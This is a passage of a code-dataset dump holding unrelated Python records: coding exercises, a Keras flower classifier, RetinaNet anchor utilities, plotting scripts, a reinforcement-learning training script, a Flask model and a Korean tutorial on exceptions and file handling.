'.join(table[i]).strip())\n","sub_path":"exercise_7.3/exercise_7.3b.py","file_name":"exercise_7.3b.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"605954233","text":"#!/usr/bin/python3\nimport curses \n\nstdscr = curses.initscr()\npad = curses.newpad(23, 120)\norder_pad = curses.newpad(10, 120)\ntimestamp = \"\"\nlast_order_update = 0\ncurses.start_color()\ncurses.noecho()\ncurses.cbreak()\ncurses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_GREEN)\ncurses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_RED)\nstdscr.keypad(1)\npad.addstr(1, 0, \"Waiting for a trade...\")\npad.refresh(0,0,0,0, 20, 20)\nstdscr.getkey()\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"196249680","text":"def solve(instructions):\n    wires = {}\n    reset = False\n    \n    while True:\n        for instruction in instructions:\n            command = instruction.split()\n            target = command[-1]\n            if len(command) == 3:\n                if not command[0][-1].isdigit() and not command[0] in wires:\n                    continue\n                val = int(command[0]) if command[0][-1].isdigit() else wires[command[0]]\n                if not reset or not command[2] == 'b':\n                    wires[command[2]] = val\n            elif command[0] == 'NOT':\n                if not command[1] in wires:\n                    continue\n                wires[target] = (~wires[command[1]] & 0xffff)\n            elif command[1] == 'LSHIFT':\n                if not command[0] in wires:\n                    continue\n                if not target in wires:\n                    wires[target] = 0\n                val = int(command[2])\n                wires[target] = wires[command[0]] << val\n            elif command[1] == 'RSHIFT':\n                if not command[0] in wires:\n                    continue\n                if not target in wires:\n                    wires[target] = 0\n                val = int(command[2])\n                wires[target] = wires[command[0]] >> val\n            else:\n                if (not command[0][-1].isdigit() and not command[0] in wires) or (not command[2][-1].isdigit() and not command[2] in wires):\n                    unset = True\n                    continue\n\n                a = int(command[0]) if command[0][-1].isdigit() else 
wires[command[0]]\n b = int(command[2]) if command[2][-1].isdigit() else wires[command[2]]\n\n if command[1] == 'AND':\n wires[target] = a & b\n elif command[1] == 'OR':\n wires[target] = a | b\n\n if 'a' in wires:\n if reset:\n return wires['a']\n reset = True\n aval = wires['a']\n wires = {'b': aval}\n \nwith open('input_7.txt', 'r') as f:\n print(solve(f.readlines()))","sub_path":"7b.py","file_name":"7b.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"623690115","text":"\"\"\"\nCopyright 2017-2018 Fizyr (https://fizyr.com)\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport numpy as np\n\n\ndef anchor_targets(image, gt_boxes, num_classes, negative_overlap=0.4, positive_overlap=0.5, **kwargs):\n # first create the anchors for this image\n anchors = anchors_for_image(image, **kwargs)\n\n # label: 1 is positive, 0 is negative, -1 is dont care\n labels = np.ones((anchors.shape[0], num_classes)) * -1\n\n # obtain indices of gt boxes with the greatest overlap\n overlaps = compute_overlap(anchors, gt_boxes[:, :4])\n argmax_overlaps_inds = np.argmax(overlaps, axis=1)\n max_overlaps = overlaps[np.arange(overlaps.shape[0]), argmax_overlaps_inds]\n\n # assign bg labels first so that positive labels can clobber them\n labels[max_overlaps < negative_overlap, :] = 0\n\n # compute box regression targets\n gt_boxes = gt_boxes[argmax_overlaps_inds]\n bbox_reg_targets = bbox_transform(anchors, gt_boxes)\n\n # fg label: above threshold IOU\n positive_indices = max_overlaps >= positive_overlap\n labels[positive_indices, :] = 0\n labels[positive_indices, gt_boxes[positive_indices, 4].astype(int)] = 1\n\n return labels, bbox_reg_targets\n\n\ndef anchors_for_image(image, pyramid_levels=None, anchor_ratios=None, anchor_scales=None, anchor_strides=None, anchor_sizes=None):\n if pyramid_levels is None:\n pyramid_levels = [3, 4, 5, 6, 7]\n if anchor_strides is None:\n anchor_strides = [2 ** x for x in pyramid_levels]\n if anchor_sizes is None:\n anchor_sizes = [2 ** (x + 2) for x in pyramid_levels]\n\n shape = np.array(image.shape[:2])\n for i in range(pyramid_levels[0] - 1):\n shape = (shape + 1) // 2 # skip the first two levels\n\n all_anchors = np.zeros((0, 4))\n for idx, p in enumerate(pyramid_levels):\n shape = (shape + 1) // 2\n anchors = generate_anchors(base_size=anchor_sizes[idx], ratios=anchor_ratios, scales=anchor_scales)\n shifted_anchors = shift(shape, anchor_strides[idx], anchors)\n all_anchors = np.append(all_anchors, shifted_anchors, axis=0)\n\n return all_anchors\n\n\ndef shift(shape, stride, anchors):\n shift_x = (np.arange(0, shape[1]) + 0.5) * stride\n shift_y = (np.arange(0, shape[0]) + 0.5) * stride\n\n shift_x, shift_y = np.meshgrid(shift_x, shift_y)\n\n shifts = np.vstack((\n shift_x.ravel(), shift_y.ravel(),\n shift_x.ravel(), shift_y.ravel()\n )).transpose()\n\n # add A anchors (1, A, 4) to\n # cell K shifts (K, 1, 4) to get\n # shift anchors (K, A, 4)\n # reshape to (K*A, 4) shifted anchors\n 
A = anchors.shape[0]\n K = shifts.shape[0]\n all_anchors = (anchors.reshape((1, A, 4)) + shifts.reshape((1, K, 4)).transpose((1, 0, 2)))\n all_anchors = all_anchors.reshape((K * A, 4))\n\n return all_anchors\n\n\ndef generate_anchors(base_size=16, ratios=None, scales=None):\n \"\"\"\n Generate anchor (reference) windows by enumerating aspect ratios X\n scales w.r.t. a reference window.\n \"\"\"\n\n if ratios is None:\n ratios = np.array([0.5, 1, 2])\n\n if scales is None:\n scales = np.array([2 ** 0, 2 ** (1.0 / 3.0), 2 ** (2.0 / 3.0)])\n\n num_anchors = len(ratios) * len(scales)\n\n # initialize output anchors\n anchors = np.zeros((num_anchors, 4))\n\n # scale base_size\n anchors[:, 2:] = base_size * np.tile(scales, (2, len(ratios))).T\n\n # compute areas of anchors\n areas = anchors[:, 2] * anchors[:, 3]\n\n # correct for ratios\n anchors[:, 2] = np.sqrt(areas / np.repeat(ratios, len(scales)))\n anchors[:, 3] = anchors[:, 2] * np.repeat(ratios, len(scales))\n\n # transform from (x_ctr, y_ctr, w, h) -> (x1, y1, x2, y2)\n anchors[:, 0::2] -= np.tile(anchors[:, 2] * 0.5, (2, 1)).T\n anchors[:, 1::2] -= np.tile(anchors[:, 3] * 0.5, (2, 1)).T\n\n return anchors\n\n\ndef bbox_transform(anchors, gt_boxes):\n \"\"\"Compute bounding-box regression targets for an image.\"\"\"\n anchor_widths = anchors[:, 2] - anchors[:, 0] + 1.0\n anchor_heights = anchors[:, 3] - anchors[:, 1] + 1.0\n anchor_ctr_x = anchors[:, 0] + 0.5 * anchor_widths\n anchor_ctr_y = anchors[:, 1] + 0.5 * anchor_heights\n\n gt_widths = gt_boxes[:, 2] - gt_boxes[:, 0] + 1.0\n gt_heights = gt_boxes[:, 3] - gt_boxes[:, 1] + 1.0\n gt_ctr_x = gt_boxes[:, 0] + 0.5 * gt_widths\n gt_ctr_y = gt_boxes[:, 1] + 0.5 * gt_heights\n\n targets_dx = (gt_ctr_x - anchor_ctr_x) / anchor_widths\n targets_dy = (gt_ctr_y - anchor_ctr_y) / anchor_heights\n targets_dw = np.log(gt_widths / anchor_widths)\n targets_dh = np.log(gt_heights / anchor_heights)\n\n targets = np.stack((targets_dx, targets_dy, targets_dw, targets_dh))\n targets = targets.T\n\n return targets\n\n\ndef compute_overlap(a, b):\n \"\"\"\n Parameters\n ----------\n a: (N, 4) ndarray of float\n b: (K, 4) ndarray of float\n Returns\n -------\n overlaps: (N, K) ndarray of overlap between boxes and query_boxes\n \"\"\"\n area = (b[:, 2] - b[:, 0] + 1) * (b[:, 3] - b[:, 1] + 1)\n\n iw = np.minimum(np.expand_dims(a[:, 2], axis=1), b[:, 2]) - np.maximum(np.expand_dims(a[:, 0], 1), b[:, 0]) + 1\n ih = np.minimum(np.expand_dims(a[:, 3], axis=1), b[:, 3]) - np.maximum(np.expand_dims(a[:, 1], 1), b[:, 1]) + 1\n\n iw = np.maximum(iw, 0)\n ih = np.maximum(ih, 0)\n\n ua = np.expand_dims((a[:, 2] - a[:, 0] + 1) * (a[:, 3] - a[:, 1] + 1), axis=1) + area - iw * ih\n\n ua = np.maximum(ua, np.finfo(float).eps)\n\n intersection = iw * ih\n\n return intersection / ua\n","sub_path":"keras_retinanet/preprocessing/anchors.py","file_name":"anchors.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"508698620","text":"import numpy as np\nfrom scipy import optimize \nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom matplotlib.ticker import AutoMinorLocator, AutoLocator\nrc('font', family = 'serif', serif = 'STIXGeneral')\n# ------------------ Eingaben ------------\nAlle_Daten_plotten = True #True\nEinen_Datensatz_schoen_plotten = False\nread_start=14 # Erste Zeile, die eingelesen wird\nabgelesene_Werte_plotten = False #False \n# ------------------------------------------\n\n# 
txt_filename_to_open=[\"05-phasenraum-045mV-minmax-FM.dat\"]\n\n# data1 = [i.strip().split() for i in open(txt_filename_to_open[0]).readlines()]\nex_data=[i.strip().split() for i in open(\"360DrehungEx_von_Mathematica.dat\").readlines()]\ntheo_data=[i.strip().split() for i in open(\"360DrehungTheo_von_Mathematica.dat\").readlines()]\n\nx1=[]; x2=[]; y1=[]; y2=[]\n\nfor i in range(len(ex_data)):\n x1=append(x1,float(ex_data[i][0])) \n y1=append(y1,float(ex_data[i][1]))\n\nfor i in range(len(theo_data)):\n x2=append(x2,float(theo_data[i][0])) \n y2=append(y2,float(theo_data[i][1])) \n \nplt.figure(0)\nplt.xlabel(u\"Frequenz [Hz]\")\nplt.ylabel(u\"Signal [arb.u.]\")\ntitle(\"Frequenzsweep mit 90mV Einstrahlspannung\")\nfont = {'family' : 'serif',\n 'weight' : 'normal',\n 'size' : 20}\n#plt.xlim([0.049,0.0885])\n#plt.ylim([-1,1.5])\nmatplotlib.rc('font', **font)\nsubplots_adjust(left=0.18, bottom=0.12, right=0.96, top=0.92, wspace=0.2, hspace=0.2)\n# plt.plot(t1,S1,\"b.\", label=\"off\")\nplt.plot(x1,y1,\"r.\", label=\"Messpunkte\")\nplt.plot(x2,y2,\"b.\", label=\"Theoretisch erwarteter Verlauf\")\n#plt.plot([1300,1700],[0.1721,0.1721],\"k--\")\ns=0.05\n#plt.plot([1477,1477,1477,1544,1544,1544],[0.0035-s,0.0035+s,0.0035,0.0035,0.0035-s,0.0035+s],\"r\")\n#plt.text(1510,-0.1,r'$\\nu_\\mathrm{Halb}$',va=\"center\",ha=\"center\",color=\"red\")\n# plt.plot([0,1],[0,0],\"k--\")\n\nplt.legend(loc=1)\t\nshow()\n","sub_path":"NMR/Data-Plots/13-Halbwertsfrequenz-360.py","file_name":"13-Halbwertsfrequenz-360.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"165439028","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"======================================================================\"\"\"\n\"\"\"IDE used: Spyder\n Python 3.6.4 on Anaconda3\"\"\"\n#============================================================================\n\"\"\"\nCreated on Mon Apr 2 00:59:13 2018\n\nDue Date: Thursday April 05 23:59 2018\n\n@author: Alem Haddush Fitwi\nEmail:afitwi1@binghamton.edu\nNeural Network & Deep Learning - EECE680C\nDepartment of Electrical & Computer Engineering\nWatson Graduate School of Engineering & Applied Science\nThe State University of New York @ Binghamton\n\"\"\"\n#============================================================================\n\"\"\"\nTerse Assignment Description:\nDesign a CNN classifier for flower classification. The data sets consists of 3\ntypes of lowers, each has 80 images. 
70 images per flower are training, and 10\n images per flower are testing.\n\"\"\"\n#============================================================================\n\"\"\"\nStep_0: Laconic Description of the solution Program Organization\nIt comprises three classes, namely\n 1) Class InputImages: handles preliminary image iputing & processing\n 2) Class CNN_Model: creates the CNN training models & Makes prediction\n 3) Class Testing: handles the calling and testing of all other classes\n\"\"\"\n#============================================================================\n#----------------------------------------------------------------------------\n\"\"\"\nStep_1: Importing Required Packages or keras modules:\n\"\"\"\n#----------------------------------------------------------------------------\nimport scipy.io\nimport scipy.misc\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten\nfrom keras.layers import Dense\nfrom keras.preprocessing.image import ImageDataGenerator\n#============================================================================\n#----------------------------------------------------------------------------\n\"\"\"\nStep_2: Constructing the Class 'InputImages': \"\"\" \n#---------------------------------------------------------------------------- \nclass InputImages:\n def extractTestImages(self,Path_1,Path_2,Path_3,X_test):\n self.Path_1=Path_1\n self.Path_2=Path_2\n self.Path_3=Path_3\n self.X_test=X_test\n for flower in range(len(self.X_test)):\n if flower < 10:\n name=\"yellow\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_test[flower] \n scipy.misc.imsave(self.Path_1+name, image_yellow)\n if flower >=10 and flower<20:\n name=\"white\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_test[flower] \n scipy.misc.imsave(self.Path_2+name, image_yellow)\n if flower >= 20 and flower < 30:\n name=\"pink\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_test[flower] \n scipy.misc.imsave(self.Path_3+name, image_yellow)\n #------------------------------------------------------------------------\n def extractTrainingImages(self,Path_4,Path_5,Path_6,X_train):\n self.Path_4=Path_4\n self.Path_5=Path_5\n self.Path_6=Path_6\n self.X_train=X_train\n for flower in range(len(self.X_train)):\n if flower < 70:\n name=\"yellow\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_train[flower] \n scipy.misc.imsave(self.Path_4+name, image_yellow)\n if flower >=70 and flower<140:\n name=\"white\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_train[flower] \n scipy.misc.imsave(self.Path_5+name, image_yellow)\n if flower >= 140 and flower < 210:\n name=\"pink\"+str(flower)+\".\"+\"jpg\"\n image_yellow=self.X_train[flower] \n scipy.misc.imsave(self.Path_6+name, image_yellow)\n#============================================================================\n#----------------------------------------------------------------------------\n\"\"\"\nStep_3: Constructing the 'Class CNN_Model' using keras: \"\"\" \n \n#---------------------------------------------------------------------------- \nclass CNN_Model:\n def createCNNModel():\n #--------------------------------------------------------------------\n # Part 1 - Building the CNN\n #--------------------------------------------------------------------\n # Initialising the CNN\n classifier = Sequential()\n # Step 1 - Convolution\n classifier.add(Conv2D(32, (3, 3), input_shape = (128, 128, 3), \n activation = 'relu'))\n # Step 2 - Pooling\n 
classifier.add(MaxPooling2D(pool_size = (2, 2)))\n        # Adding a second convolutional layer\n        classifier.add(Conv2D(32, (3, 3), activation = 'relu'))\n        classifier.add(MaxPooling2D(pool_size = (2, 2)))\n        # Step 3 - Flattening\n        classifier.add(Flatten())\n        # Step 4 - Full connection\n        classifier.add(Dense(units = 128, activation = 'relu'))\n        # three flower classes, so a 3-unit softmax output\n        classifier.add(Dense(units = 3, activation = 'softmax'))\n        # Compiling the CNN\n        classifier.compile(optimizer = 'adam', loss = 'categorical_crossentropy', \n                           metrics = ['accuracy'])\n        #--------------------------------------------------------------------\n        # Part 2: Fitting the CNN to the images\n        #--------------------------------------------------------------------\n        train_datagen = ImageDataGenerator(rescale = 1./255,\n                                           shear_range = 0.2,\n                                           zoom_range = 0.2,\n                                           horizontal_flip = True)\n        test_datagen = ImageDataGenerator(rescale = 1./255)\n        training_set = train_datagen.flow_from_directory('dataset/training_set',\n                                                         target_size = (128, 128),\n                                                         batch_size = 32,\n                                                         class_mode = 'categorical')\n        test_set = test_datagen.flow_from_directory('dataset/test_set',\n                                                    target_size = (128, 128),\n                                                    batch_size = 32,\n                                                    class_mode = 'categorical')\n        classifier.fit_generator(training_set,\n                                 steps_per_epoch = 210,\n                                 epochs = 5,\n                                 validation_data = test_set,\n                                 validation_steps = 30)\n        print(\"-------------------****************-------------------------\")\n        print(\"-------------------Training is over--------------------------\") \n        print(\"************************************************************\") \n\n#============================================================================\n#----------------------------------------------------------------------------\n\"\"\"\nStep_4: Constructing the 'class Test': \n\"\"\" \n#----------------------------------------------------------------------------\nclass Test:\n    #Reading the input image, which is in .mat format\n    im=\"imagedata.mat\"\n    dataset= scipy.io.loadmat(im)\n    X_test = scipy.io.loadmat(im, variable_names='Xtest').get('Xtest')\n    X_train= scipy.io.loadmat(im, variable_names='Xtrain').get('Xtrain')\n    Y_test = scipy.io.loadmat(im, variable_names='Ytest').get('Ytest')\n    Y_train = scipy.io.loadmat(im, variable_names='Ytrain').get('Ytrain')\n    #Extract the test images of each flower type and save them in separate folders\n    Path_1=\"dataset/test_set/yellow_flower/\"\n    Path_2=\"dataset/test_set/white_flower/\"\n    Path_3=\"dataset/test_set/pink_flower/\"\n    #Extract the training images of each flower type and save them in different folders\n    Path_4=\"dataset/training_set/yellow_flower/\"\n    Path_5=\"dataset/training_set/white_flower/\"\n    Path_6=\"dataset/training_set/pink_flower/\"\n    # Instantiating Class InputImages\n    class_input_o_1=InputImages() \n    class_input_o_2=InputImages()\n    # Instantiating Class CNN_Model \n    class_CNN_o_1=CNN_Model\n    #Calling methods of the classes\n    class_input_o_1.extractTestImages(Path_1,Path_2,Path_3,X_test)\n    class_input_o_2.extractTrainingImages(Path_4,Path_5,Path_6,X_train)\n    print(\"-------------------****************-------------------------\")\n    print(\"------------------Training is running------------------------\") \n    print(\"************************************************************\") \n    prediction=class_CNN_o_1.createCNNModel()\n#============================================================================\n\"\"\" End of Program! 
\"\"\"\n#----------------------------------------------------------------------------","sub_path":"Assignments/Homework_3/EX_12.1_Flowers/Ex_12.1_flowers_Classication.py","file_name":"Ex_12.1_flowers_Classication.py","file_ext":"py","file_size_in_byte":8874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"301629038","text":"from setuptools import setup, find_packages\n\n\n\nclassifiers = []\nwith open(\"classifiers.txt\") as fd:\n classifiers = fd.readlines()\n\n\nsetup(\n name=\"drivedroid-gen-repo\",\n version=\"0.4.4\",\n description=\"Generator for drivedroid repository files\",\n author=\"Felix Richter\",\n author_email=\"github@syntax-fehler.de\",\n url=\"http://github.com/makefu/drivedroid-repo-gen\",\n license=\"wtfpl\",\n classifiers=classifiers,\n packages=find_packages(),\n entry_points = {\n 'console_scripts' :\n ['drivedroid-gen-repo = drivedroid_gen:main'],\n },\n install_requires=['docopt'],\n)\n","sub_path":"pypi_install_script/drivedroid-gen-repo-0.4.4.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"31153309","text":"import gym\r\nimport tensorflow as tf\r\n\r\nfrom stable_baselines.common.policies import MlpPolicy\r\nfrom stable_baselines.common.vec_env import DummyVecEnv\r\nfrom stable_baselines import PPO2\r\nimport os\r\n\r\ninner_env = None\r\n\r\n\r\ndef run(learning_steps=4300):\r\n global inner_env\r\n inner_env = gym.make('gym_threshold:threshold-intra_process-extended-space-v0')\r\n env = DummyVecEnv([lambda: inner_env])\r\n\r\n model = PPO2(MlpPolicy, env, verbose=1, n_steps=128, nminibatches=4,\r\n tensorboard_log=\"tensorboard\")\r\n model.learn(total_timesteps=learning_steps, tb_log_name=os.path.basename(__file__).rstrip(\".py\"),\r\n callback=tensorboard_callback)\r\n\r\n env.close()\r\n\r\n\r\ndef tensorboard_callback(locals_, globals_):\r\n global inner_env\r\n self_ = locals_['self']\r\n if inner_env.summary_writer is None:\r\n inner_env.summary_writer = locals_['writer']\r\n\r\n return True\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run(2000000)\r\n","sub_path":"python_src/experiments/deprecated/ppo2_mlp_defaultpara_intraenv_extended_space.py","file_name":"ppo2_mlp_defaultpara_intraenv_extended_space.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322336869","text":"\r\n# Загружаем рецепты в dict\r\n\r\npath = 'F:/task2/'\r\n\r\ndishes = {}\r\nwith open(f'{path}recipes.txt', 'rb') as f:\r\n for a in f:\r\n name, ings = a.decode().strip('\\n').strip('\\r').split(':')\r\n dishes[name] = ings.split(',')\r\n \r\n# Загружаем доступные ингредиенты\r\nn = int(input())\r\nings = [str(input()) for a in range(n)]\r\n\r\n# Просто list comprehension: берем элемент при условии, \r\n# что наши ингредиенты в пересечении с требуемыми равны требуемым.\r\n\r\nwhat_we_can = [dish for dish in dishes \\\r\n if set(ings).intersection(dishes[dish]) == set(dishes[dish])]\r\n\r\n# Просто вывод\r\n\r\nprint('Вы можете приготовить:\\n' + '\\n'.join(what_we_can) if len(what_we_can) > 0 else \\\r\n 'Не найдены блюда, которые можно приготовить из данных ингредиентов :(')","sub_path":"Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"261456112","text":"class 
class Solution(object):\n    def maxSubArray(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        n = len(nums)\n        \n        tmpsum = max(nums[0], 0)\n        maxsum = nums[0]\n        \n        for i in range(1,n):\n            tmpsum += nums[i]\n            maxsum = max(tmpsum, maxsum)\n            tmpsum = max(tmpsum, 0)\n        \n        return maxsum \n","sub_path":"Solutions/Array/#053. Maximum Subarray.py","file_name":"#053. Maximum Subarray.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"8736360","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nDEFAULT_IMAGE_URL = \"https://tinyurl.com/truffle-cupcake\"\n\ndef connect_db(app):\n    \"\"\" Connects to database \"\"\"\n\n    db.app = app\n    db.init_app(app)\n\nclass Cupcake(db.Model):\n    \"\"\"model for cupcakes\"\"\"\n\n    __tablename__ = \"cupcakes\"\n\n    id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n    flavor = db.Column(db.Text, nullable=False)\n    size = db.Column(db.Text, nullable=False)\n    rating = db.Column(db.Float, nullable=False)\n    image = db.Column(db.String(300), default=DEFAULT_IMAGE_URL)","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"298949844","text":"#!/usr/bin/env python3\nimport numpy as np\nimport pandas as pd\n'''\n1.4.9 Functions\n'''\ndef getMean(numericValues):\n    return sum(numericValues)/len(numericValues) if len(numericValues) > 0 else float('nan')\nyour_list = [75, 80, 90, 95, 60, 72, 88, 92, 84, 72]\ndataframe = pd.DataFrame(your_list)\nprint(\"Output function : {!s}\".format(getMean(your_list)))\nprint(\"Output numpy.mean : {}\".format(np.mean(your_list)))\nprint(\"Output pandas.mean : {}\\n\".format(dataframe.mean()))\n\n'''\n1.4.10 Exceptions\n- p. 85, try-except\n- p. 86, try out try-except-else-finally.\n'''\n# Compute the mean of a numeric sequence\ndef getMean(numericValues):\n    return sum(numericValues)/len(numericValues)\n\nmy_list2 = [ ]\n\n# Short version\ntry:\n    print(\"Output : {}\".format(getMean(my_list2)))\nexcept ZeroDivisionError as detail:\n    print(\"Output (Error): {}\".format(float('nan')))\n    print(\"Output (Error): {}\\n\".format(detail))\n\n# Long version\ntry:\n    result = getMean(my_list2)\nexcept ZeroDivisionError as detail:\n    print(\"Output (Error): {}\".format(float('nan')))\n    print(\"Output (Error): {}\".format(detail))\nelse:\n    print(\"Output (The mean is) : {}\".format(result))\nfinally:\n    print(\"Output (Finally) : The finally block is executed every time\")\n'''\n1.5 Reading text files\n※ For data analysis you read in external files.\n- Work through the examples on pp. 86-91.\n'''\n\n#!/usr/bin/env python3\nfrom math import exp, log, sqrt\nimport re\nfrom datetime import date, time, datetime, timedelta\nfrom operator import itemgetter\nimport sys\n\n# Reading files\n# Read a single text file\nprint(\"Output : \")\n#input_file = sys.argv[1]\ninput_file = \"src/test01.txt\"\nfilereader = open(input_file, 'r')\nfor row in filereader:\n    print(row.strip())\nfilereader.close()\n\nprint(\"\\nOutput : \")\nwith open(input_file, 'r', newline='') as filereader:\n    for row in filereader:\n        print(\"{}\".format(row.strip()))\n\n'''\n1.6 Reading multiple text files with glob\n※ Data analysis often means reading in several files at once.\n- Work through the examples on pp. 91-95.\n'''\n\n#!/usr/bin/env python3\nfrom math import exp, log, sqrt\nimport re\nfrom datetime import date, time, datetime, timedelta\nfrom operator import itemgetter\nimport sys\nimport glob\nimport os\n\n# Read multiple files\nprint(\"Output : \")\n
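# Note (illustrative): glob.glob(os.path.join('src', '*.txt')) yields the matching\n# paths in arbitrary, OS-dependent order; wrap it in sorted() for a stable ordering.\n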
#inputPath = sys.argv[1]\ninputPath = \"src\"\nfor input_file in glob.glob(os.path.join(inputPath,'*.txt')):\n    with open(input_file, 'r', newline='') as filereader:\n        for row in filereader:\n            print(\"{}\".format(row.strip()))\n\n\n'''\n1.7 Writing text files\n※ In data analysis most of the output is written to files.\n- Try out the file-writing examples on pp. 95-99.\n'''\n\n# Writing files\n# Write a single text file\nmy_letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']\nmax_index = len(my_letters)\n#output_file = sys.argv[1]\noutput_file = \"src/write_to_file.txt\"\nfilewriter = open(output_file, 'w')\nfor index_value in range(len(my_letters)):\n    if index_value < (max_index-1) :\n        filewriter.write(my_letters[index_value]+'\\t')\n    else:\n        filewriter.write(my_letters[index_value]+'\\n')\nfilewriter.close()\nprint(\"\\nOutput : Output written to file\")\n\n# Write a CSV file\nmy_numbers = [0,1,2,3,4,5,6,7,8,9]\nmax_index = len(my_letters)\noutput_file = \"src/write_to_file.txt\"\nfilewriter = open(output_file, 'a')\nfor index_value in range(len(my_numbers)):\n    if index_value < (max_index-1):\n        filewriter.write(str(my_numbers[index_value])+',')\n    else:\n        filewriter.write(str(my_numbers[index_value])+'\\n')\nfilewriter.close()\nprint(\"Output : Output appended to file\")\n\n","sub_path":"Assignment/Assignment_04.py","file_name":"Assignment_04.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"291172690","text":"#!/usr/bin/python3\r\n\r\nimport random\r\n\r\na=random.randint(0,9)\r\ncount=0\r\nwhile True:\r\n    ch=input(\"Enter your choice\")\r\n    if(ch==\"exit\"):\r\n        break\r\n    else:\r\n        count+=1\r\n        if(a<int(ch)):\r\n            print(\"High\")\r\n        elif(a>int(ch)):\r\n            print(\"Low\")\r\n        else:\r\n            print(\"Awesome you found the number in {} guesses\".format(count))\r\n","sub_path":"python/practice/guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"267215210","text":"#REDDIT CHALLENGE EXERCISE 3\n'''Welcome to cipher day!\nWrite a program that can encrypt texts with an alphabetical Caesar cipher.\nThis cipher can ignore numbers, symbols, and whitespace. For extra credit,\nadd a \"decrypt\" function to your program!'''\n\n
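# Example (illustrative): with key=1 in encrypt mode, 'abc xyz' comes out as\n# 'bcd yza' (z wraps back around to a); decrypting the result with the same key restores it.\n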
def cipher(message, key, encryptdecrypt):\n    if encryptdecrypt.lower().startswith('d'):\n        key = -key\n    for symbol in message:\n        if symbol.isalpha():\n            if symbol.isupper():\n                newsymbol = ord(symbol) + key\n                if newsymbol > 90:\n                    print(chr(newsymbol - 26),end='')\n                elif newsymbol < 65:\n                    print(chr(newsymbol + 26),end='')\n                else:\n                    print(chr(newsymbol),end='')\n            if symbol.islower():\n                newsymbol = ord(symbol) + key\n                if newsymbol > 122:\n                    print(chr(newsymbol - 26),end='')\n                elif newsymbol < 97:\n                    print(chr(newsymbol + 26),end='')\n                else:\n                    print(chr(newsymbol),end='')\n        else:\n            print(symbol,end='')\n    \n    \ndef main():\n    cipher('zzzzzz AAAAAA', 1, 'encrypt')\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Easy_Challenges/Easy1to10/easy3.py","file_name":"easy3.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"39796576","text":"\"\"\"\nQ589\nN-ary Tree Preorder Traversal\nEasy\n\nGiven an n-ary tree, return the preorder traversal of its\nnodes' values.\n\nNary-Tree input serialization is represented in their level\norder traversal, each group of children is separated by the\nnull value (See examples).\n\n\nFollow up:\nRecursive solution is trivial, could you do it iteratively?\n\n\"\"\"\n\nfrom typing import List\n\n# Definition for a Node.\nclass Node:\n    def __init__(self, val=None, children=None):\n        self.val = val\n        self.children = children\n\nclass Solution:\n    def preorder(self, root: 'Node') -> List[int]:\n\n        if root is None:\n            return []\n\n        stack = [root]\n\n        preo = []\n\n        while stack:\n            current = stack.pop()\n            preo.append(current.val)\n            children = current.children\n            while children:\n                stack.append(children.pop())\n\n        return preo\n\n","sub_path":"Q589.py","file_name":"Q589.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"154122852","text":"# coding: utf-8\nfrom django.conf.urls import patterns, include, 